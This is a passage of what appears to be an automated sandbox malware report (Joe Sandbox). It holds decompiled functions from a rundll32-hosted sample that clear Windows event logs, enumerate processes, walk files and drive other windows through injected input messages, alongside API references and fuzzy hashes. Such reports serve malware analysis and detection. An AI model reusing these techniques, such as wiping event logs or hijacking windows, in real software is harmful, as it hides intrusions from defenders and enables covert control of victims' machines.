                                                            • OpenEventLogA.ADVAPI32(00000000,0467E100), ref: 0463A046
                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0463A055
                                                            • CloseEventLog.ADVAPI32(00000000), ref: 0463A058
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$ClearCloseOpen
                                                            • String ID:
                                                            • API String ID: 1391105993-0
                                                            • Opcode ID: 2dc23772e75a68d2c122bd88502610c97c2606eccfa9d44a249b42d9e9100ac7
                                                            • Instruction ID: 09d76fcab3c8fa2fe3ccda55c08c0442e110febad31fa125bda488cdb997e130
                                                            • Opcode Fuzzy Hash: 2dc23772e75a68d2c122bd88502610c97c2606eccfa9d44a249b42d9e9100ac7
                                                            • Instruction Fuzzy Hash: 72F0F631A00208ABD7019F98AC8966FBBB4FF44605F00045DE90557201FF35AC059B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0465F37F(int _a4) {
                                                            				void* _t14;
                                                            				void* _t16;
                                                            
                                                            				if(E04669427(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                            					TerminateProcess(GetCurrentProcess(), _a4);
                                                            				}
                                                            				E0465F404(_t14, _t16, _a4);
                                                            				ExitProcess(_a4);
                                                            			}





                                                            0x0465f38b
                                                            0x0465f3a7
                                                            0x0465f3a7
                                                            0x0465f3b0
                                                            0x0465f3b9

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B,046815D0,0000000C,04656104,?), ref: 0465F3A0
                                                            • TerminateProcess.KERNEL32(00000000,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B,046815D0,0000000C,04656104,?), ref: 0465F3A7
                                                            • ExitProcess.KERNEL32 ref: 0465F3B9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: d82ffcb63d774a9e1d33836bb2421fa372a07bc86b0b495d20385b8cd5f5bf82
                                                            • Instruction ID: 7f68de3eb5887e428fcaef2a06e0bfe8b8496f04c8beb42ef06e22859d1ee17a
                                                            • Opcode Fuzzy Hash: d82ffcb63d774a9e1d33836bb2421fa372a07bc86b0b495d20385b8cd5f5bf82
                                                            • Instruction Fuzzy Hash: 13E0EC31000648AFDF19AF55D90CE583BA9EF54395F004418FD558A235EF79FDA2DB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E046356D0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				char _v16;
                                                            				char _v24;
                                                            				struct _WIN32_FIND_DATAW _v616;
                                                            				char _v620;
                                                            				signed int _t23;
                                                            				signed int _t25;
                                                            				short _t27;
                                                            				short _t29;
                                                            				void* _t40;
                                                            				intOrPtr* _t42;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t46;
                                                            				intOrPtr _t50;
                                                            				intOrPtr* _t56;
                                                            				void* _t58;
                                                            				void* _t60;
                                                            				WCHAR* _t61;
                                                            				void* _t62;
                                                            				signed int _t63;
                                                            
                                                            				_t40 = __ebx;
                                                            				_t23 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t23 ^ _t63;
                                                            				_t56 = _a4 + 8;
                                                            				_t58 = __ecx;
                                                            				if( *_t56 != 0) {
                                                            					_t42 = _t56;
                                                            					_t60 = _t42 + 2;
                                                            					do {
                                                            						_t25 =  *_t42;
                                                            						_t42 = _t42 + 2;
                                                            						__eflags = _t25;
                                                            					} while (_t25 != 0);
                                                            					_t43 = _t42 - _t60;
                                                            					__eflags = _t43;
                                                            					_t44 = _t43 >> 1;
                                                            				} else {
                                                            					_t44 = 0;
                                                            				}
                                                            				_push(_t44);
                                                            				_t61 = _t58 + 0x18;
                                                            				_t45 = _t61;
                                                            				E046332A0(_t61, _t56);
                                                            				_t65 = _t61[0xa] - 8;
                                                            				if(_t61[0xa] < 8) {
                                                            					_t27 = _t61;
                                                            				} else {
                                                            					_t27 =  *_t61;
                                                            				}
                                                            				E04634670(_t45, _t65, _t27);
                                                            				_t46 =  *(_t58 + 0x28);
                                                            				if(_t61[0xa] < 8) {
                                                            					_t29 = _t61;
                                                            				} else {
                                                            					_t29 =  *_t61;
                                                            				}
                                                            				if( *((short*)(_t29 + _t46 * 2 - 2)) != 0x5c) {
                                                            					__eflags = _t61[0xa] - 8;
                                                            					if(_t61[0xa] >= 8) {
                                                            						_t61 =  *_t61;
                                                            					}
                                                            					_t62 = FindFirstFileW(_t61,  &_v616);
                                                            					__eflags = _t62 - 0xffffffff;
                                                            					if(_t62 == 0xffffffff) {
                                                            						L20:
                                                            						E046357F0(_t40, _t58, _t58, _t62);
                                                            					} else {
                                                            						_t50 =  *((intOrPtr*)(_t58 + 0x14));
                                                            						__eflags = _t50 - 4;
                                                            						if(_t50 == 4) {
                                                            							goto L20;
                                                            						} else {
                                                            							__eflags = _t50 - 2;
                                                            							if(_t50 == 2) {
                                                            								goto L20;
                                                            							} else {
                                                            								__eflags = _t50 - 6;
                                                            								if(_t50 == 6) {
                                                            									goto L20;
                                                            								} else {
                                                            									_push(_t50);
                                                            									_push(0x3f);
                                                            									_push(1);
                                                            									_push( &_v620);
                                                            									_v620 = 0x6e;
                                                            									E04631C60( *((intOrPtr*)(_t58 + 4)));
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					FindClose(_t62);
                                                            					__eflags = _v12 ^ _t63;
                                                            					return E04655AFE(_v12 ^ _t63);
                                                            				} else {
                                                            					_push(_t46);
                                                            					_push(0x3f);
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v16 = 0;
                                                            					_push(9);
                                                            					asm("movq [ebp-0x14], xmm0");
                                                            					_v24 = 0x71;
                                                            					E04631C60( *((intOrPtr*)(_t58 + 4)));
                                                            					return E04655AFE(_v12 ^ _t63,  &_v24);
                                                            				}
                                                            			}
























                                                            0x046356d0
                                                            0x046356d9
                                                            0x046356e0
                                                            0x046356e6
                                                            0x046356eb
                                                            0x046356f1
                                                            0x046356f7
                                                            0x046356f9
                                                            0x04635700
                                                            0x04635700
                                                            0x04635703
                                                            0x04635706
                                                            0x04635706
                                                            0x0463570b
                                                            0x0463570b
                                                            0x0463570d
                                                            0x046356f3
                                                            0x046356f3
                                                            0x046356f3
                                                            0x0463570f
                                                            0x04635710
                                                            0x04635714
                                                            0x04635716
                                                            0x0463571b
                                                            0x0463571f
                                                            0x04635725
                                                            0x04635721
                                                            0x04635721
                                                            0x04635721
                                                            0x04635728
                                                            0x04635731
                                                            0x04635734
                                                            0x0463573a
                                                            0x04635736
                                                            0x04635736
                                                            0x04635736
                                                            0x04635742
                                                            0x04635777
                                                            0x0463577b
                                                            0x0463577d
                                                            0x0463577d
                                                            0x0463578d
                                                            0x0463578f
                                                            0x04635792
                                                            0x046357c3
                                                            0x046357c5
                                                            0x04635794
                                                            0x04635794
                                                            0x04635797
                                                            0x0463579a
                                                            0x00000000
                                                            0x0463579c
                                                            0x0463579c
                                                            0x0463579f
                                                            0x00000000
                                                            0x046357a1
                                                            0x046357a1
                                                            0x046357a4
                                                            0x00000000
                                                            0x046357a6
                                                            0x046357a6
                                                            0x046357b0
                                                            0x046357b2
                                                            0x046357b4
                                                            0x046357b5
                                                            0x046357bc
                                                            0x046357bc
                                                            0x046357a4
                                                            0x0463579f
                                                            0x0463579a
                                                            0x046357cb
                                                            0x046357d5
                                                            0x046357e0
                                                            0x04635744
                                                            0x04635744
                                                            0x0463574b
                                                            0x0463574d
                                                            0x04635750
                                                            0x04635754
                                                            0x04635756
                                                            0x0463575c
                                                            0x04635760
                                                            0x04635774
                                                            0x04635774

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 04635787
                                                            • FindClose.KERNEL32(00000000), ref: 046357CB
                                                              • Part of subcall function 046357F0: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04635844
                                                              • Part of subcall function 046357F0: FindClose.KERNEL32(00000000,?,00000000), ref: 046358AA
                                                              • Part of subcall function 046357F0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 046358CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirst$Create
                                                            • String ID:
                                                            • API String ID: 2053571766-0
                                                            • Opcode ID: e1dcee9b050a1cbe8608d77d3f74c34d223223f119d94c4da1a5697570021c1b
                                                            • Instruction ID: 5f0698e4f1888d7240483e761d99e8b5154771fefe60ff45180c28e5d9399dbf
                                                            • Opcode Fuzzy Hash: e1dcee9b050a1cbe8608d77d3f74c34d223223f119d94c4da1a5697570021c1b
                                                            • Instruction Fuzzy Hash: 6A310834B00284EBCB28DF68D884ABEB7B5EF45716F00025DD54767280FB707986CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E04644C00(void* __ebx, void* __edx, long __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				signed int _v16;
                                                            				char _v532;
                                                            				char _v540;
                                                            				short _v548;
                                                            				char _v1052;
                                                            				char _v1060;
                                                            				short _v1068;
                                                            				char _v1572;
                                                            				char _v1580;
                                                            				short _v1588;
                                                            				char _v2092;
                                                            				char _v2100;
                                                            				short _v2108;
                                                            				char _v2612;
                                                            				char _v2620;
                                                            				short _v2628;
                                                            				intOrPtr _v2636;
                                                            				intOrPtr _v2640;
                                                            				int _v2644;
                                                            				intOrPtr _v2648;
                                                            				char _v2652;
                                                            				void* _v2656;
                                                            				signed int _v2660;
                                                            				intOrPtr _v2668;
                                                            				char _v2676;
                                                            				short _v3200;
                                                            				intOrPtr _v3212;
                                                            				intOrPtr _v3216;
                                                            				long _v3220;
                                                            				char _v3224;
                                                            				void* _v3228;
                                                            				void* _v3232;
                                                            				void* _v3236;
                                                            				void* _v3244;
                                                            				int _v3248;
                                                            				long _v3252;
                                                            				void* _v3256;
                                                            				void* _v3260;
                                                            				long _v3264;
                                                            				signed int _t135;
                                                            				long _t160;
                                                            				_Unknown_base(*)()* _t170;
                                                            				void* _t172;
                                                            				int _t176;
                                                            				int _t178;
                                                            				int _t180;
                                                            				int _t184;
                                                            				int _t186;
                                                            				signed int _t208;
                                                            				void* _t253;
                                                            				void* _t255;
                                                            				void* _t257;
                                                            				void* _t258;
                                                            				void* _t265;
                                                            				long _t283;
                                                            				long _t284;
                                                            				void* _t285;
                                                            				void* _t287;
                                                            				void* _t289;
                                                            				void* _t291;
                                                            				void* _t292;
                                                            				void* _t293;
                                                            				void* _t295;
                                                            				void* _t297;
                                                            				void* _t298;
                                                            				void* _t300;
                                                            				void* _t303;
                                                            				signed int _t304;
                                                            				signed int _t306;
                                                            				signed int _t312;
                                                            				void* _t315;
                                                            				void* _t316;
                                                            
                                                            				_t273 = __edi;
                                                            				_t269 = __edx;
                                                            				_t306 = (_t304 & 0xfffffff8) - 0xcac;
                                                            				_t135 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t135 ^ _t306;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				E0465DEA0(__edi,  &_v3220, 0, 0x22c);
                                                            				E0465DEA0(_t273,  &_v2612, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v2092, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v1572, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v1052, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v532, 0, 0x208);
                                                            				_t312 = _t306 + 0x48;
                                                            				_v2640 = 7;
                                                            				_v2644 = 0;
                                                            				_v2660 = 0;
                                                            				_t253 = CreateToolhelp32Snapshot(2, 0);
                                                            				_v3228 = _t253;
                                                            				if(_t253 != 0xffffffff) {
                                                            					_v3224 = 0x22c;
                                                            					_t300 = LocalAlloc(0x40, 0x19000);
                                                            					_t273 = 1;
                                                            					_v3248 = _t300;
                                                            					_push( &_v3224);
                                                            					 *_t300 = 0x80;
                                                            					_v3252 = 1;
                                                            					if(Process32FirstW(_t253) != 0) {
                                                            						_t303 = lstrlenW;
                                                            						do {
                                                            							_t255 = OpenProcess(0x410, 0, _v3220);
                                                            							_t160 = _v3220;
                                                            							_v3236 = _t255;
                                                            							if(_t160 != 0 && _t160 != 4 && _t160 != 8) {
                                                            								_push(_t258);
                                                            								E046445C0(_t255, _t255,  &_v2620, _t273, _t303);
                                                            								E04645DD0(_t255,  &_v2620,  &_v1580, _t273, _t303,  &_v1060,  &_v540);
                                                            								_t265 = _t255;
                                                            								E04644440(_t265,  &_v2100, _t273, _t303);
                                                            								_t315 = _t312 + 0xc;
                                                            								_v3244 = 0;
                                                            								_t170 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            								if(_t170 != 0) {
                                                            									_t265 =  &_v3244;
                                                            									 *_t170(_t255, _t265);
                                                            								}
                                                            								_v3248 = 0;
                                                            								__imp__ProcessIdToSessionId(_v3220,  &_v3248);
                                                            								_t269 = _v3228;
                                                            								_push(_t265);
                                                            								_t172 = E04636060(_t255,  &_v2652, _v3228, _t273, _t303);
                                                            								_t316 = _t315 + 4;
                                                            								E04645370(_t255,  &_v2676, _t172);
                                                            								_t174 = _v2636;
                                                            								if(_v2636 >= 8) {
                                                            									E04633540(_t255, _t269, _t273, _v2652, _t174 + 1);
                                                            								}
                                                            								_t176 = lstrlenW( &_v3200);
                                                            								_t178 = lstrlenW( &_v548);
                                                            								_t180 = lstrlenW( &_v1068);
                                                            								_v3248 = _t176 + _t178 + _t180 + lstrlenW( &_v1588);
                                                            								_t184 = lstrlenW( &_v2108);
                                                            								_t186 = lstrlenW( &_v2628);
                                                            								_t257 = _v3260;
                                                            								_t283 = _v3264 + 0x22 + _t186 + _v2660 + _t184 + _v3248 + _t186 + _v2660 + _t184 + _v3248;
                                                            								if(LocalSize(_t257) < _t283) {
                                                            									_t257 = LocalReAlloc(_t257, _t283, 0x42);
                                                            									_v3260 = _t257;
                                                            								}
                                                            								_t284 = _v3264;
                                                            								 *(_t284 + _t257) = _v3228;
                                                            								 *((intOrPtr*)(_t284 + _t257 + 4)) = _v3212;
                                                            								 *((intOrPtr*)(_t284 + _t257 + 8)) = _v3216;
                                                            								_t285 = _t284 + 0xc;
                                                            								E0465E060(_t285 + _t257,  &_v3200, 2 + lstrlenW( &_v3200) * 2);
                                                            								_t287 = _t285 + lstrlenW( &_v3200) * 2 + 2;
                                                            								E0465E060(_t287 + _t257,  &_v2628, 2 + lstrlenW( &_v2628) * 2);
                                                            								_t208 = lstrlenW( &_v2628);
                                                            								_t258 =  >=  ? _v2676 :  &_v2676;
                                                            								_t289 = _t287 + _t208 * 2 + 2;
                                                            								E0465E060(_t289 + _t257, _t258, 2 + _v2660 * 2);
                                                            								_t291 = _t289 + _v2660 * 2 + 2;
                                                            								E0465E060(_t291 + _t257,  &_v2108, 2 + lstrlenW( &_v2108) * 2);
                                                            								_t292 = _t291 + lstrlenW( &_v2108) * 2;
                                                            								 *((intOrPtr*)(_t292 + _t257 + 2)) = _v3256;
                                                            								_t293 = _t292 + 6;
                                                            								E0465E060(_t293 + _t257,  &_v1588, 2 + lstrlenW( &_v1588) * 2);
                                                            								_t295 = _t293 + lstrlenW( &_v1588) * 2 + 2;
                                                            								E0465E060(_t295 + _t257,  &_v1068, 2 + lstrlenW( &_v1068) * 2);
                                                            								_t297 = _t295 + lstrlenW( &_v1068) * 2 + 2;
                                                            								E0465E060(_t297 + _t257,  &_v548, 2 + lstrlenW( &_v548) * 2);
                                                            								_t312 = _t316 + 0x54;
                                                            								_t298 = _t297 + lstrlenW( &_v548) * 2;
                                                            								 *(_t298 + _t257 + 2) = _v3252;
                                                            								_t273 = _t298 + 6;
                                                            								_t255 = _v3244;
                                                            								_v3264 = _t273;
                                                            							}
                                                            							CloseHandle(_t255);
                                                            							_t253 = _v3232;
                                                            						} while (Process32NextW(_t253,  &_v3228) != 0);
                                                            						_t300 = _v3256;
                                                            					}
                                                            					LocalReAlloc(_t300, _t273, 0x42);
                                                            					CloseHandle(_t253);
                                                            				} else {
                                                            				}
                                                            				_t259 = _v2648;
                                                            				if(_v2648 >= 8) {
                                                            					E04633540(_t253, _t269, _t273, _v2668, _t259 + 1);
                                                            				}
                                                            				return E04655AFE(_v16 ^ _t312);
                                                            			}












































































                                                            0x04644c00
                                                            0x04644c00
                                                            0x04644c06
                                                            0x04644c0c
                                                            0x04644c13
                                                            0x04644c1a
                                                            0x04644c1b
                                                            0x04644c1c
                                                            0x04644c29
                                                            0x04644c40
                                                            0x04644c57
                                                            0x04644c6e
                                                            0x04644c85
                                                            0x04644c9c
                                                            0x04644ca1
                                                            0x04644ca4
                                                            0x04644cb1
                                                            0x04644cbc
                                                            0x04644ccd
                                                            0x04644ccf
                                                            0x04644cd6
                                                            0x04644ce6
                                                            0x04644cf4
                                                            0x04644cf6
                                                            0x04644cff
                                                            0x04644d03
                                                            0x04644d05
                                                            0x04644d08
                                                            0x04644d14
                                                            0x04644d1a
                                                            0x04644d20
                                                            0x04644d31
                                                            0x04644d33
                                                            0x04644d37
                                                            0x04644d3d
                                                            0x04644d55
                                                            0x04644d5f
                                                            0x04644d85
                                                            0x04644d94
                                                            0x04644d96
                                                            0x04644d9b
                                                            0x04644d9e
                                                            0x04644db7
                                                            0x04644dbf
                                                            0x04644dc1
                                                            0x04644dc7
                                                            0x04644dc7
                                                            0x04644dcd
                                                            0x04644dda
                                                            0x04644de0
                                                            0x04644de4
                                                            0x04644dec
                                                            0x04644df1
                                                            0x04644dfc
                                                            0x04644e01
                                                            0x04644e0b
                                                            0x04644e16
                                                            0x04644e16
                                                            0x04644e27
                                                            0x04644e33
                                                            0x04644e3f
                                                            0x04644e57
                                                            0x04644e5b
                                                            0x04644e68
                                                            0x04644e6e
                                                            0x04644e7e
                                                            0x04644e88
                                                            0x04644e94
                                                            0x04644e96
                                                            0x04644e96
                                                            0x04644e9a
                                                            0x04644ea2
                                                            0x04644ea9
                                                            0x04644eb1
                                                            0x04644eba
                                                            0x04644ed0
                                                            0x04644eea
                                                            0x04644f03
                                                            0x04644f13
                                                            0x04644f24
                                                            0x04644f36
                                                            0x04644f46
                                                            0x04644f60
                                                            0x04644f79
                                                            0x04644f8b
                                                            0x04644f92
                                                            0x04644f96
                                                            0x04644fb7
                                                            0x04644fd4
                                                            0x04644fed
                                                            0x0464500a
                                                            0x04645023
                                                            0x04645028
                                                            0x04645035
                                                            0x0464503c
                                                            0x04645040
                                                            0x04645043
                                                            0x04645047
                                                            0x04645047
                                                            0x0464504c
                                                            0x04645052
                                                            0x04645062
                                                            0x0464506a
                                                            0x0464506a
                                                            0x04645072
                                                            0x0464507b
                                                            0x04644cd8
                                                            0x04644cd8
                                                            0x04645081
                                                            0x0464508b
                                                            0x04645096
                                                            0x04645096
                                                            0x046450b1

                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04644CC7
                                                            • LocalAlloc.KERNEL32(00000040,00019000), ref: 04644CEE
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 04644D0C
                                                            • OpenProcess.KERNEL32(00000410,00000000,0000022C), ref: 04644D2B
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04644DB0
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04644DB7
                                                            • ProcessIdToSessionId.KERNEL32(?,?), ref: 04644DDA
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 04644E27
                                                            • lstrlenW.KERNEL32(?), ref: 04644E33
                                                            • lstrlenW.KERNEL32(?), ref: 04644E3F
                                                            • lstrlenW.KERNEL32(?), ref: 04644E4B
                                                            • lstrlenW.KERNEL32(?), ref: 04644E5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Process$AddressAllocCreateFirstLibraryLoadLocalOpenProcProcess32SessionSnapshotToolhelp32
                                                            • String ID: IsWow64Process$kernel32.dll
                                                            • API String ID: 1515997778-3024904723
                                                            • Opcode ID: 1ec4c1e19d95be6838f1a814b2cf7f5b9867fb413bcd39d5124679b2a33e2619
                                                            • Instruction ID: 30768663ddbae04baf351c8a5ed347b2435b75317e3d2dd4cf1e2499d75dbc09
                                                            • Opcode Fuzzy Hash: 1ec4c1e19d95be6838f1a814b2cf7f5b9867fb413bcd39d5124679b2a33e2619
                                                            • Instruction Fuzzy Hash: 6BD14DB2504345ABD721DF64DC89BDBB7ECFBC4304F400A2AE589D7150EB74A658CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04636FD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                            				signed int _v8;
                                                            				char _v276;
                                                            				struct _WINDOWPLACEMENT _v320;
                                                            				struct tagRECT _v336;
                                                            				struct HWND__* _v340;
                                                            				struct tagPOINT _v348;
                                                            				struct tagPOINT _v356;
                                                            				int _v360;
                                                            				signed int _t87;
                                                            				unsigned int _t91;
                                                            				signed short _t93;
                                                            				int _t95;
                                                            				struct HWND__* _t106;
                                                            				signed int _t110;
                                                            				int _t123;
                                                            				long _t124;
                                                            				struct HMENU__* _t126;
                                                            				void* _t132;
                                                            				signed short _t139;
                                                            				struct HWND__* _t142;
                                                            				void* _t145;
                                                            				struct tagPOINT _t147;
                                                            				int _t151;
                                                            				int _t154;
                                                            				intOrPtr _t157;
                                                            				long _t158;
                                                            				int _t163;
                                                            				struct HMENU__* _t164;
                                                            				signed short _t166;
                                                            				struct HWND__* _t167;
                                                            				int _t171;
                                                            				struct HWND__* _t172;
                                                            				int _t173;
                                                            				signed int _t176;
                                                            				signed int _t178;
                                                            
                                                            				_t178 = (_t176 & 0xfffffff8) - 0x164;
                                                            				_t87 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t87 ^ _t178;
                                                            				_v360 = 0;
                                                            				_t157 = __ecx;
                                                            				_v348.y = __ecx;
                                                            				if(_a4 + 0xffffff00 > 2) {
                                                            					_t91 = _a12;
                                                            					_t166 =  *(__ecx + 0x78);
                                                            					_t147 = _t91;
                                                            					_t93 = _t91 >> 0x10;
                                                            					_push(_t93);
                                                            					_v360 = 1;
                                                            					_v356.x = _t147;
                                                            					_v356.y = _t93;
                                                            					_v348.x =  *(__ecx + 0x74);
                                                            					 *(__ecx + 0x74) = _t147;
                                                            					 *(__ecx + 0x78) = _t93;
                                                            					_t142 = WindowFromPoint(_t147);
                                                            					_t95 = _a4;
                                                            					if(_t95 != 0x202) {
                                                            						if(_t95 != 0x201) {
                                                            							if(_t95 != 0x200) {
                                                            								goto L2;
                                                            							}
                                                            							_t106 =  *(_t157 + 0x7c);
                                                            							_v340 = _t106;
                                                            							if(_t106 == 0) {
                                                            								goto L2;
                                                            							}
                                                            							_t145 = _v348 - _v356.x;
                                                            							_v360 = _t166 - _v356.y;
                                                            							GetWindowRect(_t106,  &_v336);
                                                            							_t151 = _v336.left;
                                                            							_t171 = _v336.right - _t151;
                                                            							_t154 = _v336.top;
                                                            							_t110 =  *((intOrPtr*)(_v348.y + 0x80)) + 0xfffffffe;
                                                            							_t163 = _v336.bottom - _t154;
                                                            							if(_t110 > 0xf) {
                                                            								L42:
                                                            								MoveWindow(_v340, _t151, _t154, _t171, _t163, 0);
                                                            								goto L11;
                                                            							}
                                                            							switch( *((intOrPtr*)(_t110 * 4 +  &M04637414))) {
                                                            								case 0:
                                                            									MoveWindow(_v340, _t151 - _t145, _t154 - _v360, _t171, _t163, 0);
                                                            									goto L11;
                                                            								case 1:
                                                            									goto L42;
                                                            								case 2:
                                                            									L37:
                                                            									__esi = __ebx + __esi;
                                                            									__ecx = __ecx - __ebx;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 3:
                                                            									L41:
                                                            									__esi = __esi - __ebx;
                                                            									goto L42;
                                                            								case 4:
                                                            									__edi = __edi + _v360;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 5:
                                                            									__edx = __edx - _v360;
                                                            									__edi = __edi + _v360;
                                                            									goto L37;
                                                            								case 6:
                                                            									__edx = __edx - _v360;
                                                            									__edi = __edi + _v360;
                                                            									goto L41;
                                                            								case 7:
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 8:
                                                            									__edi = __edi - _v360;
                                                            									__esi = __ebx + __esi;
                                                            									__ecx = __ecx - __ebx;
                                                            									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                            									goto L11;
                                                            								case 9:
                                                            									__edi = __edi - _v360;
                                                            									goto L41;
                                                            							}
                                                            						}
                                                            						 *(_t157 + 0x7c) = 0;
                                                            						_t172 = FindWindowA("Button", 0);
                                                            						GetWindowRect(_t172,  &_v336);
                                                            						_push(_v356.y);
                                                            						if(PtInRect( &_v336, _v356.x) == 0) {
                                                            							E0465DEA0(_t157,  &_v276, 0, 0x104);
                                                            							_t178 = _t178 + 0xc;
                                                            							RealGetWindowClassA(_t142,  &_v276, 0x104);
                                                            							_t123 = lstrcmpA( &_v276, "#32768");
                                                            							if(_t123 != 0) {
                                                            								_t124 = SendMessageW(_t142, 0x84, 0, _a12);
                                                            								 *(_t157 + 0x80) = _t124;
                                                            								if(_t124 == 2 || _t124 + 0xfffffff6 <= 7) {
                                                            									 *(_t157 + 0x7c) = _t142;
                                                            								}
                                                            								goto L2;
                                                            							}
                                                            							_t126 = SendMessageW(_t142, 0x1e1, _t123, _t123);
                                                            							_push(_v356.y);
                                                            							_t164 = _t126;
                                                            							_t173 = MenuItemFromPoint(0, _t164, _v356.x);
                                                            							GetMenuItemID(_t164, _t173);
                                                            							PostMessageW(_t142, 0x1e5, _t173, 0);
                                                            							PostMessageW(_t142, 0x100, 0xd, 0);
                                                            							goto L11;
                                                            						}
                                                            						PostMessageW(_t172, 0xf5, 0, 0);
                                                            						goto L10;
                                                            					}
                                                            					 *(_t157 + 0x7c) = 0;
                                                            					_t158 = _a12;
                                                            					_t132 = SendMessageW(_t142, 0x84, 0, _t158) + 1;
                                                            					if(_t132 > 0x15) {
                                                            						goto L3;
                                                            					}
                                                            					_t35 = _t132 + 0x46373fc; // 0x4040404
                                                            					switch( *((intOrPtr*)(( *_t35 & 0x000000ff) * 4 +  &M046373E8))) {
                                                            						case 0:
                                                            							SetWindowLongA(_t142, 0xfffffff0, GetWindowLongA(_t142, 0xfffffff0) | 0x08000000);
                                                            							SendMessageW(_t142, 0x84, 0, _t158);
                                                            							goto L3;
                                                            						case 1:
                                                            							PostMessageW(__ebx, 0x112, 0xf020, 0);
                                                            							goto L3;
                                                            						case 2:
                                                            							_v320.length = 0x2c;
                                                            							GetWindowPlacement(__ebx,  &_v320);
                                                            							_push(0);
                                                            							if((_v320.flags & 0x00000003) == 0) {
                                                            								PostMessageW(__ebx, 0x112, 0xf030, ??);
                                                            							} else {
                                                            								PostMessageW(__ebx, 0x112, 0xf120, ??);
                                                            							}
                                                            							goto L3;
                                                            						case 3:
                                                            							PostMessageW(__ebx, 0x10, 0, 0);
                                                            							goto L3;
                                                            						case 4:
                                                            							goto L3;
                                                            					}
                                                            				} else {
                                                            					_v356.x =  *(__ecx + 0x74);
                                                            					_t139 =  *(__ecx + 0x78);
                                                            					_push(_t139);
                                                            					_v356.y = _t139;
                                                            					_t142 = WindowFromPoint( *(__ecx + 0x74));
                                                            					L2:
                                                            					_t158 = _a12;
                                                            					L3:
                                                            					ScreenToClient(_t142,  &_v356);
                                                            					_push(_v356.y);
                                                            					_t167 = ChildWindowFromPoint(_t142, _v356.x);
                                                            					if(_t167 == 0) {
                                                            						L7:
                                                            						if(_v360 != 0) {
                                                            							_t158 = (_v356.y & 0x0000ffff) << 0x00000010 | _v356.x & 0x0000ffff;
                                                            						}
                                                            						PostMessageW(_t142, _a4, _a8, _t158);
                                                            						L10:
                                                            						L11:
                                                            						return E04655AFE(_v8 ^ _t178);
                                                            					}
